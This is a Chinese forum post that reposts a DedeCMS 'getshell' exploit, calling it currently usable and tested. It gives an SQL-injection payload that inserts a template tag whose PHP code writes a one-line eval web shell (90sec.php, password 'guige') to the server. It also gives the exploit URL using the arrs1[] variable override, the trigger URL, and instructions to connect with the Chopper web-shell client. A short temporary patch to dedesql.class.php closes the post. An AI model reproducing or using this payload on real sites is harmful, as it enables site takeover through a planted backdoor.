欢迎各位兄弟 发布技术文章

这里的技术是共享的

You are here

dedecms 攻击我的网站的方法

shiping1 的头像

mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`

 

 

http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=10...

 

 

 

 

dedecms漏洞getshell EXP最新可用 2013-06-18 17:09:30

构 造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`

EXP:

http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=10...

成功增加。

访问http://www.xxx.org/plus/mytag_js.php?aid=9013
生成一句话木马.
菜刀连接 http://www.xxx.org/plus/90sec.php  密码 guige

测试OK。

临时补丁:不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的
include/dedesql.class.php

 

  1. if(isset($GLOBALS['arrs1']))

  2. {

  3. $v1 = $v2 = ”;

  4. for($i=0;isset($arrs1[$i]);$i++)

  5. {

  6. $v1 .= chr($arrs1[$i]);

  7. }

  8. for($i=0;isset($arrs2[$i]);$i++)

  9. {

  10. // $v2 .= chr($arrs2[$i]);  //注释这里

  11. }

  12. $GLOBALS[$v1] .= $v2;

  13. }

参考链接: http://dbo.pw/2013/06_13/165_html

 

普通分类: